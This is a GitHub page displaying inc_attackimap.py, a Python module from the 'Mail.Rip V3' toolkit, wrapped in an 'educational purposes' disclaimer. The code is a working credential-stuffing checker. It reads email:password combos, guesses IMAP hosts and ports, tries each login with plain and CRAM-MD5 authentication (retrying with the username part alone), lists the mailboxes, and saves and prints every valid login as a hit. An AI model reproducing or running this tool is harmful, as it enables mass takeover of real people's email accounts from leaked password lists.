-
Notifications
You must be signed in to change notification settings - Fork 1
/
inc_attackimap.py
307 lines (293 loc) · 14.6 KB
/
inc_attackimap.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
# Disclaimer:
# This code/script/application/program is solely for educational and learning purposes.
# All information, datasets, images, code, and materials are presented in good faith and
# intended for instructive use. However, noarche make no representation or warranty,
# express or implied, regarding the accuracy, adequacy, validity, reliability, availability,
# or completeness of any data or associated materials.
# Under no circumstance shall noarche have any liability to you for any loss, damage, or
# misinterpretation arising due to the use of or reliance on the provided data. Your utilization
# of the code and your interpretations thereof are undertaken at your own discretion and risk.
#
# By executing script/code/application, the user acknowledges and agrees that they have read,
# understood, and accepted the terms and conditions (or any other relevant documentation or
#policy) as provided by noarche.
#
#Visit https://github.com/noarche for more information.
#
# _.··._.·°°°·.°·..·°¯°·._.··._.·°¯°·.·° .·°°°°·.·°·._.··._
# ███╗ ██╗ ██████╗ █████╗ ██████╗ ██████╗██╗ ██╗███████╗
# ████╗ ██║██╔═══██╗██╔══██╗██╔══██╗██╔════╝██║ ██║██╔════╝
# ██╔██╗ ██║██║ ██║███████║██████╔╝██║ ███████║█████╗
# ██║╚██╗██║██║ ██║██╔══██║██╔══██╗██║ ██╔══██║██╔══╝
# ██║ ╚████║╚██████╔╝██║ ██║██║ ██║╚██████╗██║ ██║███████╗
# ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝
# °°°·._.··._.·°°°·.°·..·°¯°··°¯°·.·°.·°°°°·.·°·._.··._.·°°°
#!/usr/local/opt/python@3.8/bin/python3
# -*- coding: utf-8 -*-
__author__ = 'DrPython3'
__date__ = '2021-12-05'
__version__ = 'BETA(1.1)'
__contact__ = 'https://github.com/DrPython3'
'''
---------------------------------------------
Functions for Checking Mailpass Combos (IMAP)
---------------------------------------------
Part of << Mail.Rip V3: https://github.com/DrPython3/MailRipV3 >>
'''
# [IMPORTS]
# ---------
import sys
import ssl
import socket
import imaplib
import json
from inc_etc import result
# [VARIABLES AND OTHER STUFF]
# ---------------------------
try:
# load IMAP lists and dictionary from JSON files:
with open('inc_imapdomains.json') as inc_imapdomains:
load_imapdomains = json.load(inc_imapdomains)
imap_domains = (load_imapdomains['imapdomains'])
with open('inc_imapports.json') as inc_imapports:
load_imapports = json.load(inc_imapports)
imap_ports = (load_imapports['imapports'])
with open('inc_imapservices.json') as inc_imapservices:
load_imapservices = json.load(inc_imapservices)
imap_services = (load_imapservices['imapservices'])
except:
# on errors, set empty lists and dictionary:
imap_domains = []
imap_ports = []
imap_services = {}
# [FUNCTIONS]
# -----------
def imapchecker(default_timeout, target):
'''
Main checker function (IMAP).
:param float default_timeout: connection timeout set by user
:param str target: emailpass combo to check
:return: True (valid login), False (login not valid)
'''
# start the checking:
try:
# set variables and stuff:
sslcontext = ssl.create_default_context()
# because imaplib does not support timeout, socket here:
socket.setdefaulttimeout(float(default_timeout))
output_hits = str('imap_valid')
output_checked = str('imap_checked')
target_email = str('')
target_user = str('')
target_password = str('')
target_host = str('')
target_port = int(0)
service_info = str('')
service_found = False
connection_ok = False
md5_login = False
login_valid = False
checker_result = False
# included lists and dictionary for IMAP checker:
global imap_domains
global imap_ports
global imap_services
# prepare target information:
new_target = str(str(target).replace('\n', ''))
target_email, target_password = new_target.split(':')
target_user = str(target_email)
# try to get host and port from dictionary:
try:
service_info = str(imap_services[str(target_email.split('@')[1])])
target_host = str(service_info.split(':')[0])
target_port = int(service_info.split(':')[1])
# declare service information founnd:
service_found = True
# if previous step fails, search host and port using common values:
except:
pass
# establish connection to host (details found in imap_services):
if service_found == True:
try:
# SSL connection:
if int(target_port) == int(993):
imap_connection = imaplib.IMAP4_SSL(
host=str(target_host),
port=int(target_port),
ssl_context=sslcontext
)
# declare connection established:
connection_ok = True
# regular connection:
else:
imap_connection = imaplib.IMAP4(
host=str(target_host),
port=int(target_port)
)
# TLS:
try:
imap_connection.starttls(
ssl_context=sslcontext
)
except:
pass
# declare connection established:
connection_ok = True
except:
pass
# if no connection established, try with common values:
if connection_ok == False:
for subdomain in imap_domains:
test_host = str(str(subdomain) + str(target_email.split('@')[1]).lower())
for next_port in imap_ports:
try:
# SSL connection:
if int(next_port) == int(993):
imap_connection = imaplib.IMAP4_SSL(
host=str(test_host),
port=int(next_port),
ssl_context=sslcontext
)
# set variables to found host:
target_host = str(test_host)
target_port = int(next_port)
# declare connection established:
connection_ok = True
# regular connection:
else:
imap_connection = imaplib.IMAP4(
host=str(test_host),
port=int(next_port)
)
# TLS:
try:
imap_connection.starttls(
ssl_context=sslcontext
)
except:
pass
# set variables to found host:
target_host = str(test_host)
target_port = int(next_port)
# declare connection established:
connection_ok = True
break
except:
continue
if connection_ok == True:
break
else:
continue
# test login credentials using established connection:
if connection_ok == True:
try:
# MD5 authentification:
if 'AUTH=CRAM-MD5' in imap_connection.capabilities:
md5_login = True
# check login credentials using CRAM-MD5:
try:
login_response, login_message = imap_connection.login_cram_md5(
user=str(target_user),
password=str(target_password)
)
if str('OK') in login_response:
# declare login valid:
login_valid = True
# on errors try login with user ID from email:
except:
try:
target_user = str(target_email.split('@')[0])
login_response, login_message = imap_connection.login_cram_md5(
user=str(target_user),
password=str(target_password)
)
if str('OK') in login_response:
# declare login valid:
login_valid = True
except:
result(output_checked, str(f'{new_target};result=md5-login failed'))
else:
pass
except:
pass
if md5_login == False:
# reegular login, no CRAM-MD5:
# login with user = email:
try:
login_response, login_message = imap_connection.login(
user=str(target_user),
password=str(target_password)
)
if str('OK') in login_response:
# declare login valid:
login_valid = True
# on errors try login with user ID from email:
except:
try:
target_user = str(target_email.split('@')[0])
login_response, login_message = imap_connection.login(
user=str(target_user),
password=str(target_password)
)
if str('OK') in login_response:
# declare login valid:
login_valid = True
except:
result(output_checked, str(f'{new_target};result=login failed'))
# no connection established, write log for target:
else:
result(output_checked, str(f'{new_target};result=no connection'))
# TODO: probably change to select method ...
# with valid login, try to list mailboxes:
if login_valid == True:
try:
list_response, mailbox_list = imap_connection.list()
if str('OK') in list_response:
checker_result = True
result(output_checked, str(f'{new_target};result=login valid, listing mailboxes ok'))
else:
result(output_checked, str(f'{new_target}:result=login valid, listing mailboxes failed'))
except:
pass
try:
# TODO: in case of using select method above, send "close" first ...
imap_connection.logout()
except:
pass
if checker_result == True or login_valid == True:
result_output = str(f'email={str(target_email)}, host={str(target_host)}:{str(target_port)}, login={str(target_user)}:{str(target_password)}')
result(output_hits, result_output)
# show found login on screen:
print(f'[VALID] {result_output}')
return True
else:
return False
# on any errors while checking, write log before exit:
except:
result(output_checked, str(f'{new_target};result=check failed'))
return False
# DrPython3 (C) 2021 @ GitHub.com
# Disclaimer:
# This code/script/application/program is solely for educational and learning purposes.
# All information, datasets, images, code, and materials are presented in good faith and
# intended for instructive use. However, noarche make no representation or warranty,
# express or implied, regarding the accuracy, adequacy, validity, reliability, availability,
# or completeness of any data or associated materials.
# Under no circumstance shall noarche have any liability to you for any loss, damage, or
# misinterpretation arising due to the use of or reliance on the provided data. Your utilization
# of the code and your interpretations thereof are undertaken at your own discretion and risk.
#
# By executing script/code/application, the user acknowledges and agrees that they have read,
# understood, and accepted the terms and conditions (or any other relevant documentation or
#policy) as provided by noarche.
#
#Visit https://github.com/noarche for more information.
#
# _.··._.·°°°·.°·..·°¯°·._.··._.·°¯°·.·° .·°°°°·.·°·._.··._
# ███╗ ██╗ ██████╗ █████╗ ██████╗ ██████╗██╗ ██╗███████╗
# ████╗ ██║██╔═══██╗██╔══██╗██╔══██╗██╔════╝██║ ██║██╔════╝
# ██╔██╗ ██║██║ ██║███████║██████╔╝██║ ███████║█████╗
# ██║╚██╗██║██║ ██║██╔══██║██╔══██╗██║ ██╔══██║██╔══╝
# ██║ ╚████║╚██████╔╝██║ ██║██║ ██║╚██████╗██║ ██║███████╗
# ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝
# °°°·._.··._.·°°°·.°·..·°¯°··°¯°·.·°.·°°°°·.·°·._.··._.·°°°